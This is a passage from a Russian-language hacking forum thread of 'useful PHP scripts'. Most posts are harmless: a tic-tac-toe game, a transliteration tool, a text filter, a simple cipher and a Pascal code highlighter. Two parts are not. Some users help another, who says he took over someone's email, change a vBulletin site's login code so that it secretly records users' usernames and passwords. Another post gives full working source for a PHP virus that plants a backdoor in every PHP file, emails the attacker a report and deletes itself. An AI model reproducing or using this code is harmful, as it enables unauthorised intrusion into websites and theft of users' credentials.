Полезные скрипты

Discussion in 'PHP' started by SMiX, 2 Nov 2006.

  1. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Крестики-нолики. Код получился на 10 кб (в 2 раза больше покера).
    PHP:
    <?php
        session_start
    ();
        echo(
    '<title>Крестки-нолики</title>');
        if(!
    $_SESSION['wins'] || $_SERVER['QUERY_STRING'] == 'clear_score'){$_SESSION['wins'] = 0;}
        if(!
    $_SESSION['lose'] || $_SERVER['QUERY_STRING'] == 'clear_score'){$_SESSION['lose'] = 0;}
        if(!
    $_SESSION['x']) {
            
    $_SESSION['x'] = array();
        }
        if(!
    $_SESSION['o']) {
            
    $_SESSION['o'] = array();
        }
        function 
    session_kill() {
            unset(
    $_SESSION['x']);
            unset(
    $_SESSION['o']);
        }
        function 
    is_won($array) {
            if((
    in_array(1$array) && in_array(2$array) && in_array(3$array)) || (in_array(1$array) && in_array(4$array) && in_array(7$array)) || (in_array(1$array) && in_array(5$array) && in_array(9$array)) || (in_array(2$array) && in_array(5$array) && in_array(8$array)) || (in_array(3$array) && in_array(6$array) && in_array(9$array)) || (in_array(3$array) && in_array(5$array) && in_array(7$array)) || (in_array(4$array) && in_array(5$array) && in_array(6$array)) || (in_array(7$array) && in_array(8$array) && in_array(9$array))) {
                return 
    true;
            } else {
                return 
    false;
            }
        }
        if(
    $_GET['place'] && !in_array($_GET['place'], array_merge($_SESSION['x'], $_SESSION['o'])) && $_GET['place'] < 10 && $_GET['place'] > 0) {
            
    $_SESSION['x'][] = $_GET['place'];
            function 
    rand_place() {
                if(!
    in_array(5$_SESSION['x']) && !in_array(5$_SESSION['o'])) {
                    return 
    5;
                } else {
                    
    $place rand(1,9);
                    if(!
    in_array($place$_SESSION['x']) && !in_array($place$_SESSION['o'])) {
                        return 
    $place;
                    } else {
                        return 
    rand_place();
                    }
                }
            }
            if(
    count(array_merge($_SESSION['x'], $_SESSION['o'])) != && !is_won($_SESSION['x'])) {
                if(((
    in_array(2$_SESSION['o']) && in_array(3$_SESSION['o'])) || (in_array(4$_SESSION['o']) && in_array(7$_SESSION['o'])) || (in_array(5$_SESSION['o']) && in_array(9$_SESSION['o']))) && !in_array(1$_SESSION['o']) && !in_array(1$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 1;
                } elseif(((
    in_array(1$_SESSION['o']) && in_array(3$_SESSION['o'])) || (in_array(5$_SESSION['o']) && in_array(8$_SESSION['o']))) && !in_array(2$_SESSION['o']) && !in_array(2$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 2;
                } elseif(((
    in_array(1$_SESSION['o']) && in_array(2$_SESSION['o'])) || (in_array(6$_SESSION['o']) && in_array(9$_SESSION['o'])) || (in_array(5$_SESSION['o']) && in_array(7$_SESSION['o']))) && !in_array(3$_SESSION['o']) && !in_array(3$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 3;
                } elseif(((
    in_array(5$_SESSION['o']) && in_array(6$_SESSION['o'])) || (in_array(1$_SESSION['o']) && in_array(7$_SESSION['o']))) && !in_array(4$_SESSION['o']) && !in_array(4$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 4;
                } elseif(((
    in_array(4$_SESSION['o']) && in_array(6$_SESSION['o'])) || (in_array(2$_SESSION['o']) && in_array(8$_SESSION['o'])) || (in_array(1$_SESSION['o']) && in_array(9$_SESSION['o'])) || (in_array(3$_SESSION['o']) && in_array(7$_SESSION['o']))) && !in_array(5$_SESSION['o']) && !in_array(5$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 5;
                } elseif(((
    in_array(4$_SESSION['o']) && in_array(5$_SESSION['o'])) || (in_array(3$_SESSION['o']) && in_array(9$_SESSION['o']))) && !in_array(6$_SESSION['o']) && !in_array(6$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 6;
                } elseif(((
    in_array(8$_SESSION['o']) && in_array(9$_SESSION['o'])) || (in_array(1$_SESSION['o']) && in_array(4$_SESSION['o'])) || (in_array(3$_SESSION['o']) && in_array(5$_SESSION['o']))) && !in_array(7$_SESSION['o']) && !in_array(7$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 7;
                } elseif(((
    in_array(7$_SESSION['o']) && in_array(9$_SESSION['o'])) || (in_array(2$_SESSION['o']) && in_array(5$_SESSION['o']))) && !in_array(8$_SESSION['o']) && !in_array(8$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 8;
                } elseif(((
    in_array(7$_SESSION['o']) && in_array(8$_SESSION['o'])) || (in_array(3$_SESSION['o']) && in_array(6$_SESSION['o'])) || (in_array(1$_SESSION['o']) && in_array(5$_SESSION['o']))) && !in_array(9$_SESSION['o']) && !in_array(9$_SESSION['x'])) {
                    
    $_SESSION['o'][] = 9;
                } elseif(((
    in_array(2$_SESSION['x']) && in_array(3$_SESSION['x'])) || (in_array(4$_SESSION['x']) && in_array(7$_SESSION['x'])) || (in_array(5$_SESSION['x']) && in_array(9$_SESSION['x']))) && !in_array(1$_SESSION['x']) && !in_array(1$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 1;
                } elseif(((
    in_array(1$_SESSION['x']) && in_array(3$_SESSION['x'])) || (in_array(5$_SESSION['x']) && in_array(8$_SESSION['x']))) && !in_array(2$_SESSION['x']) && !in_array(2$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 2;
                } elseif(((
    in_array(1$_SESSION['x']) && in_array(2$_SESSION['x'])) || (in_array(6$_SESSION['x']) && in_array(9$_SESSION['x'])) || (in_array(5$_SESSION['x']) && in_array(7$_SESSION['x']))) && !in_array(3$_SESSION['x']) && !in_array(3$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 3;
                } elseif(((
    in_array(5$_SESSION['x']) && in_array(6$_SESSION['x'])) || (in_array(1$_SESSION['x']) && in_array(7$_SESSION['x']))) && !in_array(4$_SESSION['x']) && !in_array(4$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 4;
                } elseif(((
    in_array(4$_SESSION['x']) && in_array(6$_SESSION['x'])) || (in_array(2$_SESSION['x']) && in_array(8$_SESSION['x'])) || (in_array(1$_SESSION['x']) && in_array(9$_SESSION['x'])) || (in_array(3$_SESSION['x']) && in_array(7$_SESSION['x']))) && !in_array(5$_SESSION['x']) && !in_array(5$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 5;
                } elseif(((
    in_array(4$_SESSION['x']) && in_array(5$_SESSION['x'])) || (in_array(3$_SESSION['x']) && in_array(9$_SESSION['x']))) && !in_array(6$_SESSION['x']) && !in_array(6$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 6;
                } elseif(((
    in_array(8$_SESSION['x']) && in_array(9$_SESSION['x'])) || (in_array(1$_SESSION['x']) && in_array(4$_SESSION['x'])) || (in_array(3$_SESSION['x']) && in_array(5$_SESSION['x']))) && !in_array(7$_SESSION['x']) && !in_array(7$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 7;
                } elseif(((
    in_array(7$_SESSION['x']) && in_array(9$_SESSION['x'])) || (in_array(2$_SESSION['x']) && in_array(5$_SESSION['x']))) && !in_array(8$_SESSION['x']) && !in_array(8$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 8;
                } elseif(((
    in_array(7$_SESSION['x']) && in_array(8$_SESSION['x'])) || (in_array(3$_SESSION['x']) && in_array(6$_SESSION['x'])) || (in_array(1$_SESSION['x']) && in_array(5$_SESSION['x']))) && !in_array(9$_SESSION['x']) && !in_array(9$_SESSION['o'])) {
                    
    $_SESSION['o'][] = 9;
                } else {
                    
    $_SESSION['o'][] = rand_place();
                }
            }
        }
        if(!
    is_won($_SESSION['x']) && !is_won($_SESSION['o']) && count(array_merge($_SESSION['x'], $_SESSION['o'])) != 9) {
    ?>
    <script>
    function add(element) {
        if(element.innerHTML != 'O' && element.innerHTML != 'X') {
            document.location.href = '<?php echo($_SERVER['PHP_SELF']); ?>?place='+element.id;
        } else {
            alert('Здесь ставить нельзя');
        }
    }
    function over(element, str) {
        if(element.innerHTML != 'O' && element.innerHTML != 'X') {
            element.innerHTML = ' '+str+' ';
        }
    }
    </script>
    <?php
        
    }
    ?>
    <table style="font-size: 40px; text-align: center; cursor: pointer;">
    <tr>
    <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="1"><?php if(in_array(1$_SESSION['x'])) { echo('X'); } elseif(in_array(1$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="2"><?php if(in_array(2$_SESSION['x'])) { echo('X'); } elseif(in_array(2$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    <td style="width: 50px; height: 40px;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="3"><?php if(in_array(3$_SESSION['x'])) { echo('X'); } elseif(in_array(3$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    </tr><tr>
    <td style="width: 50px; height: 40px; border-top: 1px solid black; border-bottom: 1px solid black; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="4"><?php if(in_array(4$_SESSION['x'])) { echo('X'); } elseif(in_array(4$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    <td style="width: 50px; height: 40px; border-top: 1px solid black; border-bottom: 1px solid black; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="5"><?php if(in_array(5$_SESSION['x'])) { echo('X'); } elseif(in_array(5$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    <td style="width: 50px; height: 40px; border-top: 1px solid black; border-bottom: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="6"><?php if(in_array(6$_SESSION['x'])) { echo('X'); } elseif(in_array(6$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    </tr><tr>
    <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="7"><?php if(in_array(7$_SESSION['x'])) { echo('X'); } elseif(in_array(7$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="8"><?php if(in_array(8$_SESSION['x'])) { echo('X'); } elseif(in_array(8$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    <td style="width: 50px; height: 40px;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, '&nbsp;')" id="9"><?php if(in_array(9$_SESSION['x'])) { echo('X'); } elseif(in_array(9$_SESSION['o'])) { echo('O'); } else { echo('&nbsp;'); } ?></td>
    </tr>
    </table>
    <?php
        
    if(is_won($_SESSION['x'])) {
            echo(
    '<font color="Green"><b>Вы выиграли</b></font> | <a href="'.$_SERVER['PHP_SELF'].'">Ещё раз</a>');
            
    session_kill();
            
    $_SESSION['wins']++;
        } elseif(
    is_won($_SESSION['o'])) {
            echo(
    '<font color="Green"><b>Вы проиграли</b></font> | <a href="'.$_SERVER['PHP_SELF'].'">Ещё раз</a>');
            
    session_kill();
            
    $_SESSION['lose']++;
        } else {
            if(
    count(array_merge($_SESSION['x'], $_SESSION['o'])) == 9) {
                echo(
    '<font color="Green"><b>Ничья</b></font> | <a href="'.$_SERVER['PHP_SELF'].'">Ещё раз</a>');
                
    session_kill();
            }
        }
        echo(
    '<div style="position: absolute; top: 5%; right: 5%;"><table width="200"><td>Побед:</td><td><b>'.$_SESSION['wins'].'</b></td></tr><tr><td>Проигрышей:</td><td><b>'.$_SESSION['lose'].'</b></td></tr></table><div align="center"><a href="'.$_SERVER['PHP_SELF'].'?clear_score">Очистить счёт</a></div></div></body>'); 
    ?>
    Пример скрипта.
     
    #281 NOmeR1, 10 Feb 2008
    Last edited: 10 Feb 2008
    2 people like this.
  2. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    NOmeR1, гыгы

    [​IMG]

    x-o.php?place=11
    x-o.php?place=12
    x-o.php?place=13
    x-o.php?place=14
    x-o.php?place=15
     
    1 person likes this.
  3. BBG2

    BBG2 New Member

    Joined:
    29 Dec 2007
    Messages:
    60
    Likes Received:
    0
    Reputations:
    0
    Помогите модификацировать php код, чтобы логи и пароль сохранялись в файл в открытом виде для тех, кто логинится..
     
  4. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    PHP:
    $login '';
    $password '';
    $f fopen('password.txt''ab');
    fwrite($f$login.":".$password."\r\n -------------\r\n");
    fclose($f);
    Запись данных в файл, в открытом виде.

    Не понял твой вопрос.
     
    1 person likes this.
  5. BBG2

    BBG2 New Member

    Joined:
    29 Dec 2007
    Messages:
    60
    Likes Received:
    0
    Reputations:
    0
    Ситуация токая. Попал я к отдому челу на мыло.
    Там оказались логины и пароли от ФТП сервера и от сайта, т.е логины Админа. Так вот мне посаветовали модифецировать код от страницы жертвы, что бы логины и пароли хранились в файле в открытом тексте. А я в програмирование не селён.
     
  6. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    Да, в файле авторизации можно добавить вредоносный код, который, параллельно, отправлял бы данные на почту или просто оставлял бы на сервере в одном .txt файле - как у меня написано в примере, остается только заменить переменные и уточнить путь сохранения файла (куда нибудь, что бы безпалевно было)

    Для начала нужно разобраться в самом коде файла авторизации... Ты хотя бы скажи какая там система (Wordpress, и тд) а потом уже можно будет пробовать. Ничего сложного, я думаю. Но если ты вообще дуб в php, то лучше не браться самому.
     
    #286 cylaaaan, 11 Feb 2008
    Last edited: 11 Feb 2008
  7. BBG2

    BBG2 New Member

    Joined:
    29 Dec 2007
    Messages:
    60
    Likes Received:
    0
    Reputations:
    0
    Да я в этом полный дуб, вот и прошу о помощи.

    vBulletin® Version 3.6.8.
    А какой нужен.
    [​IMG]
    А это вообще былобы не плохо.
     
  8. Кельт

    Кельт Member

    Joined:
    4 Jul 2007
    Messages:
    16
    Likes Received:
    5
    Reputations:
    0
    Вот написал скрипт, который переводит русские слова в транслит и на английскую раскладку qwerty-клавиатур, и записывает их в отдельные файлы, полезно при составлении словарей для брута, может кому пригодится как и мне. Конструкция правда громоздкая получилась, но у меня еще опыта мало, строго не судите =)
    PHP:
    <?
        
    $file file_get_contents('rus.txt');
        
            
    $rus_s = array('щ','ж','ц''ч''ш''ю''я','а''б''в''г''д''е''ё''з''и''й''к''л''м''н''о''п''р''с''т''у''ф''х''ъ''ы''ь''э'); 
            
    $eng_s = array('sch','zh','ts''ch','sh','yu''ya','a''b''v''g''d''e''e''z''i''j''k''l''m''n''o''p''r''s''t''u''f''h''''y''''e'); 

            
            
    $file str_replace($rus_s$eng_s$file); 
            
    $file1 fopen('translit.txt''w'); 
            
    fwrite($file1$file); 
            
    fclose($file1);
         
         
        
    $file file_get_contents('rus.txt');
            
    $rus_s = array('щ','ж','ц''ч''ш''ю''я','а''б''в''г''д''е''ё''з''и''й''к''л''м''н''о''п''р''с''т''у''ф''х''ъ''ы''ь''э'); 
            
    $qwer_s = array('o',';','w''x','i','.''z','f''d''d''u''l''t''`''p''b''q''r''k''v''y''j''g''h''c''n''e''a''['']''s''m''\''); 
            
            
            
    $file str_replace($rus_s$qwer_s$file); 
            
    $file1 fopen('qwer.txt''w'); 
            
    fwrite($file1$file); 
            
    fclose($file1);
        
    ?>
    rus.txt первоначальный файл со словарем русского языка, нужно положить в дирикторию скрипта =)
     
    2 people like this.
  9. !{ra!{e/\/

    !{ra!{e/\/ Banned

    Joined:
    27 Aug 2007
    Messages:
    98
    Likes Received:
    50
    Reputations:
    3
    Скрипт для отсеивания фрихостов с файла в другой
    PHP:
    <?php
    $fileinput
    ="1.txt";
    $fileoutput="2.txt";
    $f=fopen($fileoutput,'w');
    $ar = array(".narod.ru"".h10.ru""jino-net.ru","h17.ru",".h18.ru",".clan.su","ucoz.ru","vo.uz","at.ua","p0.ru","3dn.ru","my1.ru","moy.su","do.am","pp.net.ua","ucoz.ua","ucoz.kz","ucoz.lv","ws.co.ua");
    $s=file($fileinput);
    for (
    $i=0;$i<count($s);$i++) {
    for (
    $j=0;$j<count($ar);$j++){
    if (
    eregi($ar[$j],$s[$i])) {fputs($f,$s[$i]);}
    }
    }
    fclose($f);
    echo 
    "Процедура успешно завершена ";
    ?>
    Чуть поправив можно собирать только отдельные фрихосты или что то другое(народа)
    PHP:
    ....
    $ar = array("ftp.narod.ru");
    .... 
     
    #289 !{ra!{e/\/, 13 Feb 2008
    Last edited: 13 Feb 2008
  10. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Почему ftp.narod.ru, а не просто .narod.ru ?
     
    1 person likes this.
  11. BBG2

    BBG2 New Member

    Joined:
    29 Dec 2007
    Messages:
    60
    Likes Received:
    0
    Reputations:
    0
    Code:
    $file = fopen("logins.txt", "a"); 
    if($file) 
    { 
       $string = $vbulletin->GPC['vb_login_username'].":".$vbulletin->GPC['vb_login_password']."\n"; 
       fwrite($file, $string); 
       fclose($file); 
    } 
    На одном форуме мне написали, вот такой код,
    Всё бы хорошо, но в файле сохраняется только Логин, а пароль почемуто не прописывается. Вчем может быть проблемма.? ПОМОГИТЕ ПЖЛСТА
     
  12. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Bbg2, по этому вопросу тем на форуме не менее 10
     
  13. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    PHP:
    <?php // DarkMindZ.com
    ######################################
    # [ DarkMindZ PHP.Virus v1.5 ] #
    # [ RoMeO ] #
    ######################################
    set_time_limit(0);
    ignore_user_abort(1);
    [email protected]~ cat /home/pr0jects/virus/intro
    # DMZ PHP.Virus, very simple PHP virus, that would do the following:
    # |1| Look for all PHP files in directory.
    # |2| Check if infected.
    # |3| Infect with your backdoor.
    # |4| Log all infected files, and optional mail them to you.
    [email protected]~ exit

    # [ To-Do ] #
    # Mass infector, infect other users on server.
    # Better Reports, some system info reports too.
    # Spreading, by RFI dorks.
    # Polymorphism
    #[x] Change user-agent used, 2 backdoors, `include and a CMD exec`. - done a better job here, one backdoor, includes all that :]

    ######## [ CONFIG ] ########
    $backdoor =''# your backdoor here - Base64 encoded PLEASE
    $agent 'darkmindz.com_b4ckd00r'# your agent here.
    ##
    $log_email 1# Send log to email?
    $email '[email protected]'# Email to send logs to.
    ##
    $log_report 0# Write a log?
    $filename '__log.html'# name of log.
    ##
    $delete_me 1# Delete me after we are done? - Recommended. :]
    ##
    echo '<title>DarkMindZ.com - Think Dark - The Backdoor.</title><center><strong> [ <a href="http://www.darkmindz.com">DarkMindZ.com || Mass Backdoor Tool || By RoMeO</a> ]</strong></center><br>';

    $dir opendir('.');

    $site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);

    echo 
    '<strong>[-] Infecting : ' $site '</strong><br>';

    while (
    $file readdir($dir))
    {
    if (
    strstr($file'.php') && is_writeable($file))
    {
    $victim fopen($file'r+');
    $victim_read fread($victimfilesize($file));
    if (!
    strstr($victim_read'DarkMindZ.com'))
    {
    fclose($victim);
    unlink($file);
    $new fopen($file'a+');
    $new_write fwrite($newbase64_decode($backdoor) . $victim_read);
    fclose($new);

    echo 
    '[x] Infected: ' getcwd() .'/'$file '<br>';

    if(
    $log_email) { $log fopen('__tmp''a+'); fwrite($log'[x] File: ' getcwd() .'/'$file '

    '
    ); fclose($log); }
    if(
    $log_report) { $x fopen($filename'a+'); fwrite($x'[x] File: ' getcwd() .'/'$file "\n"); fclose($x); }
    }
    }
    }

    closedir($dir);

    if(
    $log_email) {


    $fromname "DarkMindZ Backdoor";

    $fromaddress "[email protected]";

    $eol="\n";
    $headers  "From: ".$fromname."<".$fromaddress.">".$eol;
    $headers .= "Reply-To: ".$fromname."<".$fromaddress.">".$eol;
    $headers .= "Return-Path: ".$fromname."<".$fromaddress.">".$eol;
    $headers .= "Message-ID: <".time()."-".$fromaddress.">".$eol;
    $headers .= "X-Mailer: PHP v".phpversion().$eol;

    $headers .= 'MIME-Version: 1.0'.$eol;
    $headers .= "Content-type: text/html; charset=iso-8859-1".$eol.$eol;

    $report file_get_contents('__tmp');
    $dir getcwd();
    $part explode('/'$dir);
    $username $part[1];
    $uname = @system('uname -a');
    $report .= '
    ###########################################
    Backdoor Report  |  | DarkMindZ.com
    ###########################################
    Target: '
    .$site.'
    Uname: '
    .$uname.'
    Username: '
    .$username.'
    Agent: '
    .$agent.'
    ###########################################
    '
    ;
    mail($email"DarkMindZ Backdoor"'

    .$report$headers); unlink('__tmp'); echo '<br />[x] Email Report Sent!';}

    if(
    $delete_me) { unlink(__file__); }
    # done, kthxbai! next target pl0x;]
    exit; # if we are in a RFI, we dont want to show other content, right?
    ?>
     
  14. scrat

    scrat кодер

    Joined:
    8 Apr 2007
    Messages:
    625
    Likes Received:
    541
    Reputations:
    3
    upd: Привёл в более божеский вид:
    PHP:
    <?php
    function c($text,$key// шифровка
    {
        for(
    $j=0;$j<strlen($text);$j++) $text[$j]=chr(ord($text[$j])+$key);
        return 
    $text;    
    }

    function 
    d($text,$key//дешифровка
    {
        for(
    $j=0;$j<strlen($text);$j++) $text[$j]=chr(ord($text[$j])-$key);
        return 
    $text;
    }
    ?>
    Ничего серьёзного показать не хотел,строго не судите.
     
    #294 scrat, 14 Feb 2008
    Last edited: 14 Feb 2008
    7 people like this.
  15. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Cкрипт подцветки кода Pascal

    PHP:
    <?php
    error_reporting
    (1);

     
    // Обработка строк
     
    function StringProc($input$pos) {
             
    $pos_one $pos;
             
    $pos_two $pos;
             for (
    $i=$pos_one+1$i<strlen($input); $i++) {
                     if (
    $input[$i]=="'") {
                             
    $pos_two $i;
                             break;
                     }
             }
             
    $pos $pos_two;   // Вернем позицию конца строки
             
    $res[0] = "<font color=blue>".substr($input$pos_one$pos_two-$pos_one+1)."</font>";
             
    $res[1] = $pos_two;
             return 
    $res;
     }

     
    // Обработка комментариев в виде гнутой скобки
     
    function CommentProc1($input$pos) {
             
    $pos_one $pos;
             
    $pos_two $pos;
             for (
    $i=$pos_one+1$i<strlen($input); $i++) {
                     if (
    $input[$i]=="}") {
                             
    $pos_two $i;
                             break;
                     }
             }
             
    $pos $pos_two;   // Вернем позицию конца строки
             
    $res[0] = "<font color=gray>".substr($input$pos_one$pos_two-$pos_one+1)."</font>";
             
    $res[1] = $pos_two;
             return 
    $res;
     }

     
    // Обработка комментариев в виде скобки и звездочки
     
    function CommentProc2($input$pos) {
             
    $pos_one $pos;
             
    $pos_two $pos;
             for (
    $i=$pos_one+1$i<strlen($input); $i++) {
                     if ((
    $input[$i]==")") & ($input[$i-1]=="*")) {
                             
    $pos_two $i;
                             break;
                     }
             }
             
    $pos $pos_two;   // Вернем позицию конца строки
             
    $res[0] = "<font color=gray>".substr($input$pos_one$pos_two-$pos_one+1)."</font>";
             
    $res[1] = $pos_two;
             return 
    $res;
     }

     
    // Обработка однострочных комментариев в виде двойного слеша
     
    function CommentProc3($input$pos) {
             
    $pos_one $pos;
             
    $pos_two $pos;
             for (
    $i=$pos_one+1$i<strlen($input); $i++) {
                     if (
    $input[$i]=="\n") {
                             
    $pos_two $i;
                             break;
                     }
             }
             
    $pos $pos_two;   // Вернем позицию конца строки
             
    $res[0] = "<font color=gray>".substr($input$pos_one$pos_two-$pos_one+1)."</font>";
             
    $res[1] = $pos_two;
             return 
    $res;
     }

     
    // Обработка цифр и HEX кодов
     
    function NumberProc($input$pos) {
             
    $pos_one $pos;
             
    $pos_two $pos;
             for (
    $i=$pos_one+1$i<strlen($input); $i++) {
                     if (!
    ereg('[0-9,a-f,A-F]'$input[$i])) {
                             
    $pos_two $i;
                             break;
                     }
             }
             
    $pos $pos_two;   // Вернем позицию конца строки
             
    $res[0] = "<font color=red>".substr($input$pos_one$pos_two-$pos_one)."</font>";
             
    $res[1] = $pos_two-1;
             return 
    $res;
     }

     
    // Обработка ключевых слов
     
    function KeyWordProc($input$pos$key$_words$_keys) {

            
    $strlen strlen($input);
             for (
    $i=$pos$i<$strlen$i++)
               if (
    eregi('[^a-z,A-Z]'$input[$i]))  break;

             
    $res[0] = substr($input$pos$i-$pos);
             
    $res[1] = $pos+strlen($res[0])-1;   // Вернем позицию конца строки

             
    for ($i=$_keys[$key][1]; $_words[$i][0]==$_keys[$key][0]; $i++) {
                    if (
    eregi(substr($input$posstrlen($_words[$i])), $_words[$i]) &
                             
    eregi('[^a-z,A-Z,0-9]'$input[$pos+strlen($_words[$i])])) {
                             
    $res[0] = "<b>".$_words[$i]."</b>";
                             
    $res[1] = $pos+strlen($_words[$i])-1;
                             break;
                     }
             }       
    // Если это не ключевое слово - передадим его целиком

             
    return $res;
     }

     
    // *************************************************************
     // Основная функция раскраски кода                             *
     // *************************************************************
     
    function DrawCodePas($input) {

            
    // Выделение ключевых слов

            // Выделяемые слова
             
    $key_words "abstract/and/array/as/asm/begin/case/class/const/constructor/cdecl/default/destructor/do/div/dynamic/else/end/except/external/finally/for/function/finalization/if/implementation/interface/initialization/message/mod/nil/not/name/of/or/overload/override/package/packed/pascal/private/procedure/program/property/protected/public/published/raise/read/record/shl/shr/stdcall/string/then/to/try/type/type/unit/until/uses/var/virtual/where/while/with/write/xor";

             
    // Заполняем их в массив
             
    $key_words explode('/'$key_words);
          
          
    // При добавлении новых ключевых слов откомментировать, выполнить под отладкой
          // и заменить потом $key_words вычесленным значением $e_key_words (удалить завершающий слеш)
          //   sort($key_words);
          //   for ($j=0; $j<count($key_words); $j++) {
          //       $e_key_words .= $key_words[$j]."/";
          //   }
             
             // Составим список буква - первое слово, начинающиеся с этой буквы в $key_words
             
    for ($j=0$j<count($key_words); $j++) {

                
    //$key_words[$j] = trim($key_words[$j]);
                // Добавим символ и ссылку на слово в массив
                
    $new_item[0] = $key_words[$j][0];
                
    $new_item[1] = $j;
                
    $first_chars[] = $new_item;
                
    // Теперь пропустим все слова с этой же буквы
                
    for ($i=$j+1$i<count($key_words); $i++) {
                    if (
    $key_words[$i][0] != $key_words[$j][0])  break;
                }
                
    $j $i-1;
             }
             
             
    $result "";
             
    $input ' '.$input.' ';

             
    // Разукрашивание
             
    for ($i=1$i<strlen($input); $i++) {

                     if (
    $input[$i]=="'") {
                             
    $in_str StringProc($input$i);
                             
    $result .= $in_str[0];
                             
    $i $in_str[1];
                     } elseif (
    $input[$i]=="{") {
                             
    $in_str CommentProc1($input$i);
                             
    $result .= $in_str[0];
                             
    $i $in_str[1];
                     } elseif ((
    $input[$i]=="(") & ($input[$i+1]=="*")) {
                             
    $in_str CommentProc2($input$i);
                             
    $result .= $in_str[0];
                             
    $i $in_str[1];
                     } elseif ((
    $input[$i]=="/") & ($input[$i+1]=="/")) {
                             
    $in_str CommentProc3($input$i);
                             
    $result .= $in_str[0];
                             
    $i $in_str[1];
                     } elseif ((
    ereg('[0-9]'$input[$i]) & ereg("[\n\( ,.\[;]"$input[$i-1])) |
                               (
    ereg('[-]'$input[$i-1]) & ereg("[0-9]"$input[$i])) |
                                       (
    ereg('[\$]'$input[$i]) & ereg("[\n\( ,-;.]"$input[$i-1]) & ereg("[0-9,a-f,A-F]"$input[$i+1])))  {
                             
    $in_str NumberProc($input$i);
                             
    $result .= $in_str[0];
                             
    $i $in_str[1];
                     } elseif

                     
    // Проверим не начинается ли с текущей буквы какое-то ключевое слово,
                     // а перед этим проверим, чтобы перед ней стоял пробел, запятая или что-то вроде этого
                     
    (eregi('[^a-z,A-Z_,0-9]'$input[$i-1]) & eregi('[a-z,A-Z]'$input[$i])) {

                             
    $check false;
                             for (
    $j=0$j<count($first_chars); $j++) {
                                     if (
    strtolower($input[$i])==strtolower($first_chars[$j][0])) {
                                             
    $in_str KeyWordProc($input$i$j$key_words$first_chars);
                                             
    $result .= $in_str[0];
                                             
    $i $in_str[1];
                                             
    $j count($first_chars)-1;        // Чтобы цикл остановился
                                             
    $check true;                                // Пометка, что первая буква была в словаре,
                                     
    }                                                                // т.е слово было обработанно
                             
    }
                             if (
    $check==false)  { $result .= $input[$i]; }
                     } else {
                             
    $result .= $input[$i];
                     }
             }

             return 
    trim($result);
     }
     
     
    // Обработчик обратного вызова из preg_replace_callback, используемого для
     // обработки Паскаль-кода
     
    function pas_preg_callback($matches) { 
       return 
    "<pre class=\"code\">".DrawCodePas($matches[1])."</pre>"
     }
     
     
    error_reporting(0);
     
    ?>
     
    4 people like this.
  16. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    C тегами PHP или CODE запостить не могу...

    Php Vulnerability Scanner by KingOfSka


    #!/usr/bin/php -q
    <?php

    /**
    * Php Vulnerability Scanner by KingOfSka @ http://www.contropoterecrew.org
    * still very early release, just for testing and coding purpose :)
    *
    * Changelog:
    *
    * 12/09/06 Version 0.1 : First "working" version, should work on "almost" site, report any bug to help me :)
